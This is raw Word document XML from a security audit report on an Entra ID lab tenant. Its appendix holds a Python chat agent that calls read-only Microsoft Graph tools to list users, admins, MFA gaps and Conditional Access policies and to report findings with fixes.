          <w:p w14:paraId="5748FC7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f"/roleManagement/directory/roleAssignments?$filter=roleDefinitionId eq '{role_id}'&amp;$expand=principal"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2609927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845563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w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="77088A0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1DA38AB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"name": a["principal"].get("displayName") or a["principal"].get("appId"),</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="260DE24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a["principal"].get("@odata.type", "").split(".")[-1],</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7DAF90E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"id": a["principal"]["id"],</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5357654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AD45F6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for a in assignments</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="205BF43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2B5A68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DC123E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58B905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if __name__ == "__main__":</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="162C48C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print("Users:", len(get_users()))</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3BF0832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print("Global Admins:", [a["userPrincipalName"] for a in get_global_admins()])</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="14E399D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print("CA policies:", [p["displayName"] for p in get_ca_policies()])</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2A634513" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC1FF9">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D5DBEA6" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="berschrift1"/>
        <w:spacing w:before="400"/>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="29" w:name="_Toc243301447"/>
      <w:r w:rsidRPr="00DC1FF9">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Appendix G — entra_agent.py (full source)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="29"/>
    </w:p>
    <w:p w14:paraId="5067AA7D" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC1FF9">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Stages 2 &amp; 3 deliverable: the conversational Entra security agent, with the full tool registry and custom parameter schemas.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3404627D" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="160"/>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC1FF9">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
          <w:color w:val="6B7280"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>$ cat entra_agent.py</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="9500" w:type="dxa"/>
        <w:tblBorders>
          <w:top w:val="single" w:sz="6" w:space="0" w:color="00FF66"/>
          <w:left w:val="single" w:sz="6" w:space="0" w:color="00FF66"/>
          <w:bottom w:val="single" w:sz="6" w:space="0" w:color="00FF66"/>
          <w:right w:val="single" w:sz="6" w:space="0" w:color="00FF66"/>
        </w:tblBorders>
        <w:tblCellMar>
          <w:left w:w="10" w:type="dxa"/>
          <w:right w:w="10" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="0000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9500"/>
      </w:tblGrid>
      <w:tr w:rsidR="00530310" w:rsidRPr="00DC1FF9" w14:paraId="3FDDA151" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9500" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="000000"/>
            <w:tcMar>
              <w:top w:w="160" w:type="dxa"/>
              <w:left w:w="200" w:type="dxa"/>
              <w:bottom w:w="160" w:type="dxa"/>
              <w:right w:w="200" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="2743308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import os, json</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="57A959B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from dotenv import load_dotenv</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="16E3EE4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from openai import AzureOpenAI</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="41387B4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import graph_client as g</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2EDEEF3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98C24A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load_dotenv()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5067681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client = AzureOpenAI(</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2A12495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azure_endpoint=os.getenv("AZURE_OPENAI_ENDPOINT"),</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1A94BE3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api_key=os.getenv("AZURE_OPENAI_KEY"),</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5752FB0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api_version="2025-04-01-preview",</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2574553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7AF50DF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MODEL = os.getenv("AZURE_OPENAI_DEPLOYMENT")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2626B74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6519E6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SYSTEM_PROMPT = (</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="74374C3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"You are an Entra ID security analyst. Answer only from tool results, never guess. "</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="087459B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a tool errors, say so. For each finding explain why it is a risk and how to fix it. "</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="72A272B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"Report every finding as: Finding, Risk, Fix, Severity (High/Medium/Low). "</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D17708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"Before reporting missing Conditional Access coverage, call get_security_defaults, "</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6745D98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"since Security Defaults also enforce MFA and block legacy authentication."</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7DB6864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5E4B20A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33050B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to_json(data, limit=12000):</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6F94DF6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text = json.dumps(data, default=str)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3D4B86B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text if len(text) &lt;= limit else text[:limit] + '..."[truncated]"'</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="157B83C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E7B41B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def admins_without_mfa():</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1994A37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return [m["userPrincipalName"] for m in g.get_mfa_status()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="765080A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m["isAdmin"] and not m["isMfaRegistered"]]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0964276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6248CF8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name -&gt; (function, description)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1E4DFC2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REGISTRY = {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="30CE5D8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"get_users": (g.get_users, "List all users in the tenant."),</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="77E6A7D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"get_guests": (g.get_guests, "List guest (external) users."),</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="66C2760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"get_global_admins": (g.get_global_admins, "List members of the Global Administrator role."),</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4D36623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"get_ca_policies": (g.get_ca_policies, "List Conditional Access policies."),</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3A631EB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"get_admins_without_mfa": (admins_without_mfa, "List admins with no MFA registered."),</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="079D3B0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"get_service_principals": (g.get_service_principals, "List service principals."),</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="35EF37E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"check_legacy_auth_blocked": (g.check_legacy_auth_blocked, "Check whether legacy authentication is blocked by Conditional Access."),</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="353FFB5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"get_risky_service_principals": (g.get_risky_service_principals, "List own-tenant service principals holding high-risk Graph permissions."),</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="72995C4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"check_admin_mfa_policy": (g.check_admin_mfa_policy, "Check whether a Conditional Access policy requires MFA for admins."),</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="00768B7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"get_security_defaults": (g.get_security_defaults, "Check whether Security Defaults are enabled."),</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5ED1A64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"get_user_owned_objects": (lambda upn="david.martinez@wwlx961259.onmicrosoft.com": g.get_user_owned_objects(upn), "List objects owned by a given user (by UPN)."),</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2BE3EAC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"get_sp_role_assignments": (g.get_sp_role_assignments, "Get app role assignments and OAuth2 grants for a service principal by its object id."),</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="61B2871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"get_user_owned_devices": (g.get_user_owned_devices, "List devices owned by a given user, by UPN."),</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="18F5836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"get_user_owned_groups": (g.get_user_owned_groups, "List groups owned by a given user, by UPN."),</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1DBEDE8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"get_sp_directory_roles": (g.get_sp_directory_roles, "List directory roles a service principal is a member of, by its object id."),</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3E6BF8A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lastRenderedPageBreak/>
              <w:t xml:space="preserve">    "get_role_members": (g.get_role_members, "List users and service principals holding a given directory role, by role display name."),</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4F2DD73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2CA5F83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630991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CUSTOM_SCHEMA_TOOLS = {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="416E074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"get_sp_role_assignments", "get_user_owned_devices",</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="35194B3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"get_user_owned_groups", "get_sp_directory_roles", "get_role_members",</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2667477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632D427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A5BF62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tools = [{</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="14FFC42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"function",</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3314378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"function": {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="29A1F99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"name": name, "description": desc,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="45F1431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"parameters": {"type": "object", "properties": {}},</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="53A7A16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60E789F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for name, (_, desc) in REGISTRY.items() if name not in CUSTOM_SCHEMA_TOOLS]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2DA3ABC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B00F6B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tools.append({</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6F0577A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"function",</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3FCC7C9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"function": {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="22D5745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"name": "get_sp_role_assignments",</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="71DE121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"description": REGISTRY["get_sp_role_assignments"][1],</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6F69C5D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"parameters": {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="47D6B05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"object",</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1237526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"properties": {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6F61ACC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"sp_id": {"type": "string", "description": "The service principal's object id (not appId)."}</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="112E73A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E17EFB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"required": ["sp_id"],</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3754FB3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236CA8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1B05149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2CF45D8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5B5722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tools.append({</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0CE998D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"function",</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="789932F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"function": {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2844224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"name": "get_user_owned_devices",</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="58E4498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"description": REGISTRY["get_user_owned_devices"][1],</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="48E56EF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"parameters": {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="24DE2EE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"object",</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7AB935F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"properties": {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2E5848D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"upn": {"type": "string", "description": "User principal name, e.g. david.martinez@wwlx961259.onmicrosoft.com"}</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0BEECFD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63A881B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"required": ["upn"],</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="528500B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378CE3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C8BB8C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773C3E8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5D37762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tools.append({</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="33BD213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"function",</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="79B033C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"function": {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="77BEB88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"name": "get_user_owned_groups",</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6ABAC4A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"description": REGISTRY["get_user_owned_groups"][1],</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1A17F76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"parameters": {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="247A894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"object",</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0BF21DE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"properties": {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6270D81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"upn": {"type": "string", "description": "User principal name, e.g. david.martinez@wwlx961259.onmicrosoft.com"}</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1E1FC42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3B4CA0F"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"required": ["upn"],</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="09B87CA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592553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lastRenderedPageBreak/>
              <w:t xml:space="preserve">    },</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="59DC6E0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787517B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3F1AE0C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tools.append({</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="052D24E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"function",</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2FED952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"function": {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="487EB2F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"name": "get_sp_directory_roles",</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3FA5368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"description": REGISTRY["get_sp_directory_roles"][1],</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4029AFB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"parameters": {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1A479F3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"object",</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="48B37AE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"properties": {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="287F218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"sp_id": {"type": "string", "description": "The service principal's object id (not appId)."}</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3034F1B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A298E2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"required": ["sp_id"],</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="273F99D5"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DFD394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68A20E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7C1DBAF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1B99E57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tools.append({</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7A05540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"function",</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="39769C0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"function": {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="164C13E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"name": "get_role_members",</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7FA4659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"description": REGISTRY["get_role_members"][1],</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="60D99E6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"parameters": {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="179DD152"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"type": "object",</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1C7407B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"properties": {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2A58B18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"role_name": {"type": "string", "description": "Exact directory role display name, e.g. 'Privileged Authentication Administrator'"}</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="27A03F4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9A90E9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"required": ["role_name"],</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="75A28C3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7EA7C30"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79AB25A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t>
            </w:r>
          </w:p>
          <w:p w14:paraId="35D0B7B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2324899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messages = [{"role": "system", "content": SYSTEM_PROMPT}]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4BBE98AE"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69F4219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while True:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="55B9FB5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user_input = input("You: ")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5AEC361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user_input.lower() == "exit":</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="32E4B38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break</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0AC8165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messages.append({"role": "user", "content": user_input})</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="390DC85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60CBAF6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while True:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0115280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response = client.chat.completions.create(</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="23ACBEE7"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model=MODEL, messages=messages, tools=tools,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3524662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max_completion_tokens=8000,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="506FE16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6F2674C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msg = response.choices[0].message</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="315B0EB3"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messages.append(msg)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0D4FAE31"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44DA340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if not msg.tool_calls:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="020A495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print(f"AI: {msg.content}\n")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5FAD01F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break</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0B31861A"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w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="05F2595B"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for call in msg.tool_calls:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3D5ABD98"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print(f"[tool called: {call.function.name}]")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D28394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try:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6B2A1016"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args = json.loads(call.function.arguments or "{}")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="47B81E24"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result = to_json(REGISTRY[call.function.name][0](**args))</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7D69388C"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except Exception as e:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="48AB3B29"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lastRenderedPageBreak/>
              <w:t xml:space="preserve">                result = f"ERROR: {e}"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6C0967BD" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="10"/>
              <w:rPr>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DC1FF9">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:noProof/>
                <w:color w:val="33FF66"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">            messages.append({"role": "tool", "tool_call_id": call.id, "content": result})</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="34826A62" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="154C7E0E" w14:textId="77777777" w:rsidR="005244C1" w:rsidRDefault="005244C1">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="57665E65" w14:textId="77777777" w:rsidR="005244C1" w:rsidRDefault="005244C1">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="72A733FC" w14:textId="77777777" w:rsidR="005244C1" w:rsidRDefault="005244C1">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0954EFAC" w14:textId="77777777" w:rsidR="005244C1" w:rsidRDefault="005244C1">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="074CEAA8" w14:textId="77777777" w:rsidR="005244C1" w:rsidRDefault="005244C1">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F5CDD04" w14:textId="77777777" w:rsidR="005244C1" w:rsidRDefault="005244C1">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0C6DA578" w14:textId="77777777" w:rsidR="005244C1" w:rsidRDefault="005244C1">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="54FC6E5B" w14:textId="77777777" w:rsidR="005244C1" w:rsidRDefault="005244C1">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0AAA5E39" w14:textId="77777777" w:rsidR="005244C1" w:rsidRDefault="005244C1">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="62DB68BA" w14:textId="77777777" w:rsidR="005244C1" w:rsidRDefault="005244C1">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="384D5517" w14:textId="77777777" w:rsidR="005244C1" w:rsidRDefault="005244C1">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="126A6CB8" w14:textId="77777777" w:rsidR="005244C1" w:rsidRDefault="005244C1">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0F9FC77F" w14:textId="77777777" w:rsidR="005244C1" w:rsidRDefault="005244C1">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6104AD19" w14:textId="77777777" w:rsidR="005244C1" w:rsidRDefault="005244C1">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E4E0CD1" w14:textId="77777777" w:rsidR="005244C1" w:rsidRDefault="005244C1">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="639C1FD3" w14:textId="77777777" w:rsidR="005244C1" w:rsidRDefault="005244C1">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5010958D" w14:textId="77777777" w:rsidR="0053372F" w:rsidRPr="00F32FCD" w:rsidRDefault="0053372F" w:rsidP="0053372F">
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:contextualSpacing/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="ADLaM Display" w:eastAsia="Century Schoolbook" w:hAnsi="ADLaM Display" w:cs="ADLaM Display"/>
          <w:b/>
          <w:noProof/>
          <w:color w:val="FE8637"/>
          <w:sz w:val="144"/>
          <w:szCs w:val="144"/>
          <w:lang w:val="en-US"/>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pPr>
      <w:r w:rsidRPr="00F32FCD">
        <w:rPr>
          <w:rFonts w:ascii="ADLaM Display" w:eastAsia="Century Schoolbook" w:hAnsi="ADLaM Display" w:cs="ADLaM Display"/>
          <w:b/>
          <w:noProof/>
          <w:color w:val="FE8637"/>
          <w:sz w:val="144"/>
          <w:szCs w:val="144"/>
          <w:lang w:val="en-US"/>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props3d w14:extrusionH="57150" w14:contourW="0" w14:prstMaterial="softEdge">
            <w14:bevelT w14:w="25400" w14:h="38100" w14:prst="circle"/>
          </w14:props3d>
        </w:rPr>
        <w:t>END</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3273EA0F" w14:textId="77777777" w:rsidR="005244C1" w:rsidRPr="00DC1FF9" w:rsidRDefault="005244C1">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="005244C1" w:rsidRPr="00DC1FF9">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3FE10" w14:textId="77777777" w:rsidR="005F751E" w:rsidRDefault="005F751E">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="4A0CDB93" w14:textId="77777777" w:rsidR="005F751E" w:rsidRDefault="005F7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pyrus">
    <w:panose1 w:val="03070502060502030205"/>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DLaM Display">
    <w:charset w:val="00"/>
    <w:family w:val="auto"/>
    <w:pitch w:val="variable"/>
    <w:sig w:usb0="8000206F" w:usb1="4200004A"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20972" w14:textId="77777777" w:rsidR="00530310"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822C85">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822C85">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50AF8" w14:textId="77777777" w:rsidR="005F751E" w:rsidRDefault="005F751E">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="6BDC8B38" w14:textId="77777777" w:rsidR="005F751E" w:rsidRDefault="005F75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504B" w14:textId="022CC45E" w:rsidR="00530310" w:rsidRDefault="00000000">
    <w:pPr>
      <w:jc w:val="right"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:color w:val="6B7280"/>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
      </w:rPr>
      <w:t xml:space="preserve">Chat </w:t>
    </w:r>
    <w:r w:rsidR="008B14E0">
      <w:rPr>
        <w:color w:val="6B7280"/>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
      </w:rPr>
      <w:t>With</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:color w:val="6B7280"/>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
      </w:rPr>
      <w:t xml:space="preserve"> Entra(Goat) — Security Audit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31D8F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="703882F4"/>
    <w:lvl w:ilvl="0" w:tplc="5972FFE2">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="4852D7B8">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="○"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="47A28764">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="■"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="92AA0F48">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="83283C96">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="○"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="A6825DA8">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="■"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="846EDC74">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
